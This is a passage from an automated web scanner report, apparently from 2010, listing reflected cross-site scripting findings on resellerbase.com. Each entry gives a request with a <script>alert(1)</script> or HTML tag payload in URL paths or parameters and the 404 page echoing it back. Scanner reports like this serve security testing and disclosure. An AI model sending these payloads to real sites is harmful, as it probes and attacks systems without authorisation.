This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos51423<script>alert(1)</script>4870c7dcaf5/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos51423<script>alert(1)</script>4870c7dcaf5/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3507. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 74c59<script>alert(1)</script>df4247a29aa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images74c59<script>alert(1)</script>df4247a29aa/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images74c59<script>alert(1)</script>df4247a29aa/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3508. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ed7a1<script>alert(1)</script>3059487b008 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratinged7a1<script>alert(1)</script>3059487b008/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratinged7a1<script>alert(1)</script>3059487b008/4.gif was not found on this server.</p>
...[SNIP]...

2.3509. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fd26d<script>alert(1)</script>57caed670ae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/4.giffd26d<script>alert(1)</script>57caed670ae HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/4.giffd26d<script>alert(1)</script>57caed670ae was not found on this server.</p>
...[SNIP]...

2.3510. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a297<script>alert(1)</script>c49edf71fe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/4.gif?1a297<script>alert(1)</script>c49edf71fe6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/4.gif?1a297<script>alert(1)</script>c49edf71fe6=1 was not found on this server.</p>
...[SNIP]...

2.3511. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72c0a<script>alert(1)</script>c24acb601e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail72c0a<script>alert(1)</script>c24acb601e6/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail72c0a<script>alert(1)</script>c24acb601e6/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3512. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff520<script>alert(1)</script>d5224d59aec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6ff520<script>alert(1)</script>d5224d59aec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6ff520<script>alert(1)</script>d5224d59aec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3513. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e70a2<script>alert(1)</script>ebaf3a3a5d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themese70a2<script>alert(1)</script>ebaf3a3a5d4/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themese70a2<script>alert(1)</script>ebaf3a3a5d4/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3514. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload becc7<script>alert(1)</script>b132f8ae1b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmosbecc7<script>alert(1)</script>b132f8ae1b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmosbecc7<script>alert(1)</script>b132f8ae1b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3515. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1885<script>alert(1)</script>e52b246e872 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/imagesc1885<script>alert(1)</script>e52b246e872/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/imagesc1885<script>alert(1)</script>e52b246e872/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3516. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ec4da<script>alert(1)</script>e4c111c5250 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/ratingec4da<script>alert(1)</script>e4c111c5250/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/ratingec4da<script>alert(1)</script>e4c111c5250/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3517. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a1c4c<script>alert(1)</script>67ee473c034 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/search.phpa1c4c<script>alert(1)</script>67ee473c034?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.phpa1c4c<script>alert(1)</script>67ee473c034?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3518. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 810a4<a>1ee205683b5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search810a4<a>1ee205683b5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search810a4<a>1ee205683b5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3519. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b9472<a>09a06cb2ab6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...b9472<a>09a06cb2ab6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...b9472<a>09a06cb2ab6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3520. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 106d3<script>alert(1)</script>9f2aea15b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&106d3<script>alert(1)</script>9f2aea15b3e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&106d3<script>alert(1)</script>9f2aea15b3e=1 was not found on this server.</p>
...[SNIP]...

2.3521. http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ac0ee<a>e8c147c7c04 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ac0ee<a>e8c147c7c04 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/6/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ac0ee<a>e8c147c7c04 was not found on this server.</p>
...[SNIP]...

2.3522. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5d36<script>alert(1)</script>a839f616cdc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf5d36<script>alert(1)</script>a839f616cdc/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf5d36<script>alert(1)</script>a839f616cdc/6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3523. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25e2e<script>alert(1)</script>67874a96f41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/625e2e<script>alert(1)</script>67874a96f41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/625e2e<script>alert(1)</script>67874a96f41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3524. http://www.resellerbase.com/detail/6/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/6/themes/kosmos/images/search.php

Issue detail

